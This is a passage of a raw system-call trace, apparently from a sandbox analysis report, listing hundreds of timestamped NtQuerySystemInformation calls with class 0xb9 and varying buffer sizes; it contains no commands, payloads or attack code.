ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0280.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0280.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0280.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0280.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0280.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0280.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0280.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0280.477] NtQuerySystemInformation 